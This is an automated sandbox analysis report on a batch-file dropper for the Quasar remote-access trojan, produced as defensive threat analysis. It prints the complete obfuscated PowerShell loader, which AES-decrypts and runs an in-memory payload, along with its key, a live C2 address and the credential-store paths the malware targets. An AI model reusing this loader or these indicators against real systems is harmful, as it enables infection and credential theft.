Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
deneme.bat

Overview

General Information

Sample Name:deneme.bat
Analysis ID:876996
MD5:140518164b4e215675accd37cae0d91f
SHA1:605f1798f9b54b245e35ea516c6e3818463953a7
SHA256:3411ad812be09efa84946389ddf8fcbc2c1faa7aec4fd419fe02ec748f746abb
Tags:bat
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected Quasar RAT
Renames powershell.exe to bypass HIPS
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2948 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mode.com (PID: 5932 cmdline: Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C)
    • certutil.exe (PID: 6972 cmdline: CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat" MD5: EB199893441CED4BBBCB547FE411CF2D)
    • allah.bat.exe (PID: 6956 cmdline: "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] (''))) MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "QkrG1hrlPre4ELMGpY9VYUHNOoORaPrBaHOp0CYrLIPMR+5cUmlROjz9Udd+vkXFOJEpFXADJds5arUUD6SxXlBwSKE8zfsNw+U8P2e//dux99J83x0AVxAwFSHO/o7DRK2sA1imzXKM0/UdruohOUW9v7k4IzizqjklFzvm3xQniTnCG7JZzn7HsnH4i3BsBn0Ir6Q4QIfhFtv8aVA+tgqM5UrCTl8xr1nhSq+Rto87G9H7TNOydNEgLULlJt19Yujn8vGhoTJOVXhyQAlcpA5suYauo4PuhJMV4fRhaFqK1z+pJIe73OoWWO2La70/DIjQdFGWiM+9t+LQ7AuuiVQDXqjZ5VuFMEatd7yImwQ+MI+3HikoNCejHoquP1TjeugPLg5fuaxOIf8BGtU3Bl6zNeZf5eRwUKclMh90b1/S455jE6LJ+ak61xkR3yKSY67v1gUrfQzY4cXrD4e7aG711nqKD0PbyPtPUZlC4Sr8kpWVriUQ1otLmkZIxrbKHiy2tiC/p/CWkmEu7CANNZbLYG0512HfSvEMSE/t8MFcDKOluxc7S+bEBAlTW9UTB4Y4aDZ8QuaJqjn28VrrAR+p0QmypnDo0FOnmJ13O73QjMbWOD83IkJOR8zesXzE5FfQgmEu+O5Wz3tOkoVdw9sQX/Oc+TrzZvb9KYzUJpw=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOlTpo8LWfXRZIepKFV3RzANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTIzMDUyMDE4NDcwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkc9l37JeZdDNiK5Nd7sqsX48TrYGmt8wpMOudDbHsJ9jQCTkD3mRy+BXeSJTOBGjzFaic5W8Wd5evNwi1sjsiTRo+0jGfXHsSV2LHHrUlOJVo/n0Jeyn+tk5+JrbQuMQTi8nIxoNIQBH26JldwOD4NGtk8JtnvAEj3s6jsqTszNBdzX9eUdlSmDF7C8Gs7MSO8aOFFcbxseOfRiKVx6J2C1kUurANTYxDnW+FW3+f0ES9sVVyMjcJVG3q83hTg/8wCLj5/z+D+j81PvtbaRtFbBkOtoMP8HeJtKZl9N7lS1WDO1bHRsTyaE71ZkbuUjtCRa87TvYyq8zKiHlklIPyF/JDaZJqC/R0Mp+oseIISooumlhSjTvOG981/dx5/bsf+zTG80KUf7jbefORcOAbf/kCzOhJ6QxM6aSKZmo7cADVmDdc3L5y6Pd1DDGkSUgyepeZ0dbNmiftNtZtIrWg8D/vJQBmWfTZtgNTL9sbgXVlNUc2kQIwkI1U6pE8XWbSSl60SqwkO+kOMuL7byhuefKmAUQGFbwh6Bsoao9Qq3WOEnKpwh6WaOlw4Yq6aznlAZ4HnUCWpqyQOj5E5wXMc2BxsDaP98UhH3oB/osvDjxGhEXuMsySisfrsrZr0nMhUCJR+1UfKhZFf2W1OOvCS2gLeQwX6S9P240E+FOIBUCAwEAAaMyMDAwHQYDVR0OBBYEFNjjH99zEKAJrNI0wsELubp4dsr7MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAA9p4WnELDlsxMW4J6yYbMgpN0bCtHsTyILqWvwXfpjC884kfbVp5yEKrtXvtlnmldsRTWG9VBt8KvHqcW4TKAOiFJQAJ0b0i5mjFhFv5KNfj1pCc9qEmxx9eEtB0jemRwJHWEgqatkdlYh5WMpFaeOidZ/pdD7gEYQzK1uKsO57JIKoI6288Af2gVfddm/en0dzemjQwhwlvqRaxZRy+IGrhAP2JYYib0TGpwt1C6n9gdpmd5YMksShUCRPD7qby/Hvppuyj/RolEELCN9KHJWVEBDTnPdZi4nGCe45CsG6mKQ33Ad2vmIQ1OJztrjGWs4n6smcz6EpX3zP41UfrHktiCTSfJe3zIO7p0M/xvITAUKX2MMLgZVGo4e2WYlXiCle1cH2yg66+w4k0QHsY0qS+lMf3SC7Ea8CxkgTQkp173Ztxbi2PFTUmhPVYboiHBmug0Ds/jDAmv4Y3Br3bePcy3bmhBeiFGA7uQ4FQ5z6ew2PEIlZErD0z+41a2rMlEA8PkaxfPSmvVTBFT7jT8aJidXy9WLrGCFuokwaW47d6r7P50Hn6w5CT8EAeR5La239+oVVRGhEZsNDqM/Kcd/BV8dk7grMJgqhStHkl4+3gAipCnd6S7g6glUMUjSnxV7yCTb3jcVD0Z+4vEnujYFzM9IZy4BQL6NN994l1+6d"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmpMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth (Nextron Systems)
  • 0x2a1b9e:$x1: Quasar.Common.Messages
  • 0x2b1ec7:$x1: Quasar.Common.Messages
  • 0x2be4ae:$x4: Uninstalling... good bye :-(
  • 0x2bfc99:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
      • 0x2bda60:$f1: FileZilla\recentservers.xml
      • 0x2bdaa0:$f2: FileZilla\sitemanager.xml
      • 0x2bdae2:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
      • 0x2bdd2e:$b1: Chrome\User Data\
      • 0x2bdd84:$b1: Chrome\User Data\
      • 0x2be05c:$b2: Mozilla\Firefox\Profiles
      • 0x2be158:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x30f895:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      • 0x2be2b0:$b4: Opera Software\Opera Stable\Login Data
      • 0x2be36a:$b5: YandexBrowser\User Data\
      • 0x2be3d8:$b5: YandexBrowser\User Data\
      • 0x2be0ac:$s4: logins.json
      • 0x2bdde2:$a1: username_value
      • 0x2bde00:$a2: password_value
      • 0x2be0ec:$a3: encryptedUsername
      • 0x322f75:$a3: encryptedUsername
      • 0x2be110:$a4: encryptedPassword
      • 0x322f93:$a4: encryptedPassword
      • 0x322f11:$a5: httpRealm
      00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
      • 0x18e3aa:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
      • 0x2be598:$s3: Process already elevated.
      • 0x2a189d:$s4: get_PotentiallyVulnerablePasswords
      • 0x28b959:$s5: GetKeyloggerLogsDirectory
      • 0x2b1626:$s5: GetKeyloggerLogsDirectory
      • 0x2a18c0:$s6: set_PotentiallyVulnerablePasswords
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.allah.bat.exe.20e693c0000.6.raw.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth (Nextron Systems)
      • 0x2a1b9e:$x1: Quasar.Common.Messages
      • 0x2b1ec7:$x1: Quasar.Common.Messages
      • 0x2be4ae:$x4: Uninstalling... good bye :-(
      • 0x2bfc99:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
      4.2.allah.bat.exe.20e693c0000.6.raw.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
        4.2.allah.bat.exe.20e693c0000.6.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          4.2.allah.bat.exe.20e693c0000.6.raw.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
          • 0x2bda60:$f1: FileZilla\recentservers.xml
          • 0x2bdaa0:$f2: FileZilla\sitemanager.xml
          • 0x2bdae2:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
          • 0x2bdd2e:$b1: Chrome\User Data\
          • 0x2bdd84:$b1: Chrome\User Data\
          • 0x2be05c:$b2: Mozilla\Firefox\Profiles
          • 0x2be158:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
          • 0x30f895:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
          • 0x2be2b0:$b4: Opera Software\Opera Stable\Login Data
          • 0x2be36a:$b5: YandexBrowser\User Data\
          • 0x2be3d8:$b5: YandexBrowser\User Data\
          • 0x2be0ac:$s4: logins.json
          • 0x2bdde2:$a1: username_value
          • 0x2bde00:$a2: password_value
          • 0x2be0ec:$a3: encryptedUsername
          • 0x322f75:$a3: encryptedUsername
          • 0x2be110:$a4: encryptedPassword
          • 0x322f93:$a4: encryptedPassword
          • 0x322f11:$a5: httpRealm
          4.2.allah.bat.exe.20e693c0000.6.raw.unpackMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
          • 0x18e3aa:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
          • 0x2be598:$s3: Process already elevated.
          • 0x2a189d:$s4: get_PotentiallyVulnerablePasswords
          • 0x28b959:$s5: GetKeyloggerLogsDirectory
          • 0x2b1626:$s5: GetKeyloggerLogsDirectory
          • 0x2a18c0:$s6: set_PotentiallyVulnerablePasswords
          Click to see the 13 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "QkrG1hrlPre4ELMGpY9VYUHNOoORaPrBaHOp0CYrLIPMR+5cUmlROjz9Udd+vkXFOJEpFXADJds5arUUD6SxXlBwSKE8zfsNw+U8P2e//dux99J83x0AVxAwFSHO/o7DRK2sA1imzXKM0/UdruohOUW9v7k4IzizqjklFzvm3xQniTnCG7JZzn7HsnH4i3BsBn0Ir6Q4QIfhFtv8aVA+tgqM5UrCTl8xr1nhSq+Rto87G9H7TNOydNEgLULlJt19Yujn8vGhoTJOVXhyQAlcpA5suYauo4PuhJMV4fRhaFqK1z+pJIe73OoWWO2La70/DIjQdFGWiM+9t+LQ7AuuiVQDXqjZ5VuFMEatd7yImwQ+MI+3HikoNCejHoquP1TjeugPLg5fuaxOIf8BGtU3Bl6zNeZf5eRwUKclMh90b1/S455jE6LJ+ak61xkR3yKSY67v1gUrfQzY4cXrD4e7aG711nqKD0PbyPtPUZlC4Sr8kpWVriUQ1otLmkZIxrbKHiy2tiC/p/CWkmEu7CANNZbLYG0512HfSvEMSE/t8MFcDKOluxc7S+bEBAlTW9UTB4Y4aDZ8QuaJqjn28VrrAR+p0QmypnDo0FOnmJ13O73QjMbWOD83IkJOR8zesXzE5FfQgmEu+O5Wz3tOkoVdw9sQX/Oc+TrzZvb9KYzUJpw=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOlTpo8LWfXRZIepKFV3RzANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTIzMDUyMDE4NDcwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkc9l37JeZdDNiK5Nd7sqsX48TrYGmt8wpMOudDbHsJ9jQCTkD3mRy+BXeSJTOBGjzFaic5W8Wd5evNwi1sjsiTRo+0jGfXHsSV2LHHrUlOJVo/n0Jeyn+tk5+JrbQuMQTi8nIxoNIQBH26JldwOD4NGtk8JtnvAEj3s6jsqTszNBdzX9eUdlSmDF7C8Gs7MSO8aOFFcbxseOfRiKVx6J2C1kUurANTYxDnW+FW3+f0ES9sVVyMjcJVG3q83hTg/8wCLj5/z+D+j81PvtbaRtFbBkOtoMP8HeJtKZl9N7lS1WDO1bHRsTyaE71ZkbuUjtCRa87TvYyq8zKiHlklIPyF/JDaZJqC/R0Mp+oseIISooumlhSjTvOG981/dx5/bsf+zTG80KUf7jbefORcOAbf/kCzOhJ6QxM6aSKZmo7cADVmDdc3L5y6Pd1DDGkSUgyepeZ0dbNmiftNtZtIrWg8D/vJQBmWfTZtgNTL9sbgXVlNUc2kQIwkI1U6pE8XWbSSl60SqwkO+kOMuL7byhuefKmAUQGFbwh6Bsoao9Qq3WOEnKpwh6WaOlw4Yq6aznlAZ4HnUCWpqyQOj5E5wXMc2BxsDaP98UhH3oB/osvDjxGhEXuMsySisfrsrZr0nMhUCJR+1UfKhZFf2W1OOvCS2gLeQwX6S9P240E+FOIBUCAwEAAaMyMDAwHQYDVR0OBBYEFNjjH99zEKAJrNI0wsELubp4dsr7MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAA9p4WnELDlsxMW4J6yYbMgpN0bCtHsTyILqWvwXfpjC884kfbVp5yEKrtXvtlnmldsRTWG9VBt8KvHqcW4TKAOiFJQAJ0b0i5mjFhFv5KNfj1pCc9qEmxx9eEtB0jemRwJHWEgqatkdlYh5WMpFaeOidZ/pdD7gEYQzK1uKsO57JIKoI6288Af2gVfddm/en0dzemjQwhwlvqRaxZRy+IGrhAP2JYYib0TGpwt1C6n9gdpmd5YMksShUCRPD7qby/Hvppuyj/RolEELCN9KHJWVEBDTnPdZi4nGCe45CsG6mKQ33Ad2vmIQ1OJztrjGWs4n6smcz6EpX3zP41UfrHktiCTSfJe3zIO7p0M/xvITAUKX2MMLgZVGo4e2WYlXiCle1cH2yg66+w4k0QHsY0qS+lMf3SC7Ea8CxkgTQkp173Ztxbi2PFTUmhPVYboiHBmug0Ds/jDAmv4Y3Br3bePcy3bmhBeiFGA7uQ4FQ5z6ew2PEIlZErD0z+41a2rMlEA8PkaxfPSmvVTBFT7jT8aJidXy9WLrGCFuokwaW47d6r7P50Hn6w5CT8EAeR5La239+oVVRGhEZsNDqM/Kcd/BV8dk7grMJgqhStHkl4+3gAipCnd6S7g6glUMUjSnxV7yCTb3jcVD0Z+4vEnujYFzM9IZy4BQL6NN994l1+6d"}
          Multi AV Scanner detection for submitted file
          Source: deneme.batVirustotal: Detection: 16%Perma Link
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\allah.batAvira: detection malicious, Label: TR/Dldr.Malnote.U
          Yara detected Quasar RAT
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR
          Source: Binary string: powershell.pdbUGP source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: Binary string: powershell.pdb source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr

          Networking

          barindex
          Yara detected Generic Downloader
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: 74.234.104.236
          Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
          Source: global trafficTCP traffic: 192.168.2.3:49702 -> 74.234.104.236:3131
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: unknownTCP traffic detected without corresponding DNS query: 74.234.104.236
          Source: allah.bat.exe, 00000004.00000002.677997205.0000020E68E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E520F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: allah.bat.exe, 00000004.00000002.677997205.0000020E68E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.cot
          Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
          Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
          Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.633628598.0000020E518B2000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
          Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

          E-Banking Fraud

          barindex
          Yara detected Quasar RAT
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
